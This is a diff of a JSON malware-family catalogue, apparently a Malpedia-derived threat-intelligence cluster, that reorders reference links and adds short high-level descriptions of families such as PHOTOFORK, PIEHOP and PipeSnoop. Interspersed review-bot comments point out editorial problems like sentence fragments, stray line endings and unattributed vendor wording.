+ "https://securelist.com/petya-the-two-in-one-trojan/74609/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/",
 "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/"
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html",
+ "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/"
 ],
 "synonyms": [],
 "type": []
@@ -37365,12 +39084,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom",
- "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware",
- "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/",
- "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/",
 "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/",
 "https://intel471.com/blog/a-brief-history-of-ta505",
 "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html",
+ "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware",
+ "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf"
 ],
 "synonyms": [],
@@ -37384,29 +39103,32 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos",
- "https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground",
- "https://blogs.blackberry.com/en/2021/11/zebra2104",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://paraflare.com/luci-spools-the-fun-with-phobos-ransomware/",
- "https://blog.malwarebytes.com/threat-analysis/2019/07/a-deep-dive-into-phobos-ransomware/",
 "https://securelist.com/cis-ransomware/104452/",
+ "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew",
- "https://www.sri.ro/articole/atac-cibernetic-cu-aplicatia-ransomware-phobos",
+ "https://twitter.com/rivitna2/status/1674718854549831681",
+ "https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/",
+ "https://paraflare.com/luci-spools-the-fun-with-phobos-ransomware/",
+ "https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware",
 "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://cert.pl/en/posts/2023/02/breaking-phobos/"
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://blogs.blackberry.com/en/2021/11/zebra2104",
+ "https://blog.malwarebytes.com/threat-analysis/2019/07/a-deep-dive-into-phobos-ransomware/",
+ "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground",
+ "https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://cert.pl/en/posts/2023/02/breaking-phobos/",
+ "https://www.acronis.com/en-sg/cyber-protection-center/posts/8base-ransomware-stays-unseen-for-a-year/",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://www.sri.ro/articole/atac-cibernetic-cu-aplicatia-ransomware-phobos"
 ],
 "synonyms": [],
 "type": []
@@ -37419,10 +39141,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_keylogger",
- "https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
 "https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/",
- "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass"
+ "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger"
 ],
 "synonyms": [],
 "type": []
@@ -37437,8 +39159,8 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_locker",
 "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
 "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
 "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
 "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
 ],
 "synonyms": [],
@@ -37465,9 +39187,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal",
+ "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf",
 "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
- "https://elastic.github.io/security-research/intelligence/2022/03/02.phoreal-targets-southeast-asia-financial-sector/article/",
- "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf"
+ "https://elastic.github.io/security-research/intelligence/2022/03/02.phoreal-targets-southeast-asia-financial-sector/article/"
 ],
 "synonyms": [
 "Rizzo"
@@ -37482,66 +39204,104 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex",
- "https://twitter.com/_CPResearch_/status/1447852018794643457",
- "https://research.checkpoint.com/2019/phorpiex-breakdown/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://bin.re/blog/phorpiex/",
- "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/",
- "https://therecord.media/phorpiex-botnet-shuts-down-source-code-goes-up-for-sale/",
 "https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html",
- "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet",
- "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/",
- "https://www.johannesbader.ch/2016/02/phorpiex/",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://research.checkpoint.com/2021/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/",
- "https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/",
 "https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/",
- "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows"
+ 
"https://research.checkpoint.com/2019/phorpiex-breakdown/",
+ "https://research.checkpoint.com/2021/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet",
+ "https://therecord.media/phorpiex-botnet-shuts-down-source-code-goes-up-for-sale/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/",
+ "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/",
+ "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/",
+ "https://twitter.com/_CPResearch_/status/1447852018794643457",
+ "https://www.johannesbader.ch/2016/02/phorpiex/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://bin.re/blog/phorpiex/",
+ "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/"
 ],
 "synonyms": [
- "Trik"
+ "Trik",
+ "phorphiex"
 ],
 "type": []
 },
 "uuid": "9759f99b-6d6c-4633-aa70-cb1d2bacc540",
 "value": "Phorpiex"
 },
+ {
+ "description": "PHOTOFORK is a downloader which is a modified version of GZIPLOADER. It was first detected in February 2023 and was distributed by TA581 along with an unattributed threat activity cluster that facilitated initial access. 
In this version, the configuration file is no longer encrypted using a simple XOR algorithm with a 64-byte key. Instead, it uses a custom algorithm previously used by the Standard core loader. This algorithm decrypts DLL strings that are needed to resolve handles to the necessary DLLs later on. The strings are decrypted using an algorithm that splits the data into DWORDs and XORs it against a random key. The main objective of PHOTOFORK remains the same as GZIPLOADER, i.e. to deliver an encrypted bot and core DLL loader (forked) that loads the Forked ICEDID bot into memory using a custom PE format.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.photofork",
+ "https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "10d3dd4b-8858-4131-bcf0-60982f36e43d",
+ "value": "PHOTOFORK"
+ },
+ {
+ "description": "PHOTOLITE is the lite version of the GZIPLOADER with limited capabilities i.e. for example it does not have any functionality to exfiltrate the host information. This new variant is observed as a follow-on payload in a TA542 Emotet campaign back in November'22. contains a static URL to download a \"Bot Pack\" file with a static name (botpack.dat) which results in the IcedID Lite DLL Loader, and then delivers the Forked version of IcedID Bot, leaving out the webinjects and backconnect functionality that would typically be used for banking fraud. 
",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.photolite",
+ "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return",
+ "https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid",
+ "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e4609860-99f9-47c9-9e36-350611466f3c",
+ "value": "PHOTOLITE"
+ },
 {
 "description": "A loader used to deliver IcedID, fetching a fake image from which payloads are extracted.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.photoloader",
- "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/",
- "https://isc.sans.edu/diary/29740",
- "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary",
- "https://www.team-cymru.com/post/from-chile-with-malware",
- "https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/",
- "https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://research.openanalysis.net/icedid/bokbot/photoloader/config/2023/04/06/photoloader.html",
- "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
- "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
- "https://twitter.com/felixw3000/status/1521816045769662468",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload/",
- "https://blog.talosintelligence.com/following-the-lnk-metadata-trail",
- 
"https://www.youtube.com/watch?v=4j8t9kFLFIY",
- "https://isc.sans.edu/diary/28636",
- "https://www.elastic.co/security-labs/unpacking-icedid",
- "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service",
- "https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing",
- "https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1",
 "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes",
+ "https://twitter.com/felixw3000/status/1521816045769662468",
+ "https://www.elastic.co/security-labs/unpacking-icedid",
+ "https://blog.talosintelligence.com/following-the-lnk-metadata-trail",
+ "https://leandrofroes.github.io/posts/Reversing-a-recent-IcedID-Crypter/",
+ "https://isc.sans.edu/diary/29740",
+ "https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/",
+ "https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload/",
+ "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service",
+ "https://www.silentpush.com/blog/icedid-command-and-control-infrastructure",
 "https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns",
+ "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/",
 "https://sysopfb.github.io/malware,/icedid/2020/04/28/IcedIDs-updated-photoloader.html",
+ "https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://www.silentpush.com/blog/icedid-command-and-control-infrastructure"
+ "https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid",
+ "https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing",
+ "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary",
+ "https://www.youtube.com/watch?v=4j8t9kFLFIY",
+ "https://www.team-cymru.com/post/from-chile-with-malware",
+ 
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid",
+ "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
+ "https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/",
+ "https://isc.sans.edu/diary/28636",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
+ "https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1",
+ "https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/",
+ "https://www.first.org/resources/papers/amsterdam23/IcedID-FIRST-AMS-2023.pdf",
+ "https://unit42.paloaltonetworks.com/wireshark-quiz-icedid-answers/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://research.openanalysis.net/icedid/bokbot/photoloader/config/2023/04/06/photoloader.html"
+ ],
+ "synonyms": [
+ "GZIPLOADER"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "3418ca80-73d9-49ab-836a-98230a83c67d",
@@ -37552,8 +39312,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket",
- "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html",
- "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
+ "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
 ],
 "synonyms": [],
 "type": []
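Review bot: The PHOTOLITE description added in this hunk contains a sentence fragment — `back in November'22. contains a static URL to download a \"Bot Pack\" file` has lost its subject — and appears to end with a stray space before the closing quote, although the chunking of this diff makes the exact trailing characters hard to confirm; suggest `back in November'22. It contains a static URL to download a \"Bot Pack\" file` and trimming the whitespace. Both new entries describe themselves as variants of GZIPLOADER, and the same hunk records GZIPLOADER as a synonym of PhotoLoader (uuid 3418ca80-73d9-49ab-836a-98230a83c67d); if this cluster uses the galaxy `related` array, a link from PHOTOFORK and PHOTOLITE to that uuid would make the family relationship machine-readable rather than prose-only. The lowercase `phorphiex` synonym added to Phorpiex reads as a spelling variant rather than a distinct alias; if it is carried over from the upstream source that is fine, otherwise it is worth dropping.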
@@ -37561,6 +39321,19 @@
 "uuid": "2eb298de-e14b-46c1-a45f-26ae0d2c4003",
 "value": "PICKPOCKET"
 },
+ {
+ "description": "According to Mandiant, PIEHOP is a disruption tool written in Python and packaged with PyInstaller version 2.1+ that has the capability to connect to a user supplied remote MSSQL server for uploading files and issuing remote commands to a RTU.\r\nPIEHOP expects its main function to be called via another Python file, supplying either the argument control=True or upload=True. At a minimum, it requires the following arguments: oik, user, and pwd, and if called with control=True, it must also be supplied with iec104.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.piehop",
+ "https://www.mandiant.com/resources/blog/cosmicenergy-ot-malware-russian-response"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2b025b03-9241-4fe4-b691-46c7bace87e4",
+ "value": "PIEHOP"
+ },
 {
 "description": "",
 "meta": {
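Review bot: The PIEHOP description embeds a Windows line ending (`\r\n`) inside the JSON string, and the PLAY description in the hunk at `@@ -37757,21 +39547,23 @@` does the same with `\r\n\r\n`, while every other description in these hunks is a single line. Consumers that render descriptions verbatim will carry the carriage return into HTML or terminal output, so normalising to `\n` (or a single space) would keep the field consistent across entries, e.g. `...issuing remote commands to a RTU.\nPIEHOP expects its main function...`. If these strings are produced by an import script rather than edited by hand, the normalisation belongs in that script so it does not have to be repeated per entry.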
@@ -37576,12 +39349,14 @@
 "value": "Pierogi"
 },
 {
- "description": "",
+ "description": "Introducing Pikabot, an emerging malware family that comprises a downloader/installer, a loader, and a core backdoor component. Despite being in the early stages of development, it already demonstrates advanced techniques in evasion, injection, and anti-analysis. Notably, the loader component incorporates an array of sophisticated anti-debugging and anti-VM measures inspired by the open-source Al-Khaser project, while leveraging steganography to conceal its payload. Additionally, Pikabot utilizes a proprietary C2 framework and supports a diverse range of commands, encompassing host enumeration and advanced secondary payload injection options.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot",
+ "https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot",
+ "https://medium.com/@DCSO_CyTec/shortandmalicious-pikabot-and-the-matanbuchus-connection-5e302644398",
 "https://minerva-labs.com/blog/beepin-out-of-the-sandbox-analyzing-a-new-extremely-evasive-malware/",
- "https://medium.com/@DCSO_CyTec/shortandmalicious-pikabot-and-the-matanbuchus-connection-5e302644398"
+ "https://d01a.github.io/pikabot/"
 ],
 "synonyms": [],
 "type": []
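Review bot: The new Pikabot description opens with `Introducing Pikabot, an emerging malware family that comprises ...`, vendor-blog phrasing copied without attribution, whereas the neighbouring entries attribute their text (`According to Mandiant, ...`, `Cisco Talos states that ...`). Rewording the opening to `According to Zscaler, Pikabot is an emerging malware family that comprises ...` would match that convention — the Zscaler technical analysis is the first reference added in this hunk, but confirm it is the source of the text before naming it. `Despite being in the early stages of development` is also a time-bound claim that will age in a static cluster entry, so it is better dropped or dated.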
@@ -37594,9 +39369,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html",
 "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf"
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/"
 ],
 "synonyms": [],
 "type": []
@@ -37605,7 +39381,7 @@
 "value": "PILLOWMINT"
 },
 {
- "description": "According to F-Secure, the PinchDuke information stealer gathers system configuration information, steals user credentials, and collects user files from the compromised host transferring these via HTTP(S) to a C&C server. F-Secure believes that PinchDuke’s credential stealing functionality is based on the source code of the Pinch credential stealing malware (also known as LdPinch) that was developed in the early 2000s and has later been openly distributed on underground forums.",
+ "description": "According to F-Secure, the PinchDuke information stealer gathers system configuration information, steals user credentials, and collects user files from the compromised host transferring these via HTTP(S) to a C&C server. F-Secure believes that PinchDuke\u2019s credential stealing functionality is based on the source code of the Pinch credential stealing malware (also known as LdPinch) that was developed in the early 2000s and has later been openly distributed on underground forums.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pinchduke",
@@ -37622,8 +39398,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pingback",
- "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel/"
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel/",
+ "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/"
 ],
 "synonyms": [],
 "type": []
@@ -37649,8 +39425,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipemon",
- "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
- "https://twitter.com/ESETresearch/status/1506904404225630210"
+ "https://twitter.com/ESETresearch/status/1506904404225630210",
+ "https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html",
+ "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/"
 ],
 "synonyms": [],
 "type": []
@@ -37658,6 +39435,19 @@
 "uuid": "34c0b51a-7139-44ab-b09a-cef646e66ba0",
 "value": "PipeMon"
 },
+ {
+ "description": "Cisco Talos states that PipeSnoop can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipesnoop",
+ "https://blog.talosintelligence.com/introducing-shrouded-snooper/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "29e75560-d16f-4434-a6a5-0258a916103d",
+ "value": "PipeSnoop"
+ },
 {
 "description": "Infostealer",
 "meta": {
@@ -37676,11 +39466,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi",
+ "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/",
 "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-mayfair",
 "https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong",
- "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/"
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mayfair"
 ],
 "synonyms": [
 "CookieCutter",
@@ -37696,11 +39486,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou",
- "https://isc.sans.edu/diary/rss/25068",
- "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf",
- "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884",
 "http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.565.9211&rep=rep1&type=pdf",
- "https://johannesbader.ch/2019/07/the-dga-of-pitou/"
+ "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884",
+ "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf",
+ "https://johannesbader.ch/2019/07/the-dga-of-pitou/",
+ "https://isc.sans.edu/diary/rss/25068"
 ],
 "synonyms": [],
 "type": []
@@ -37727,8 +39517,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot",
- "http://blog.kleissner.org/?p=788",
- "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot"
+ "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot",
+ "http://blog.kleissner.org/?p=788"
 ],
 "synonyms": [
 "Bublik",
@@ -37745,9 +39535,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee",
+ "https://unit42.paloaltonetworks.com/atoms/rancortaurus/",
 "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/",
 "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://unit42.paloaltonetworks.com/atoms/rancortaurus/",
 "https://www.secureworks.com/research/threat-profiles/bronze-overbrook"
 ],
 "synonyms": [],
@@ -37757,21 +39547,23 @@
 "value": "PLAINTEE"
 },
 {
- "description": "Ransomware",
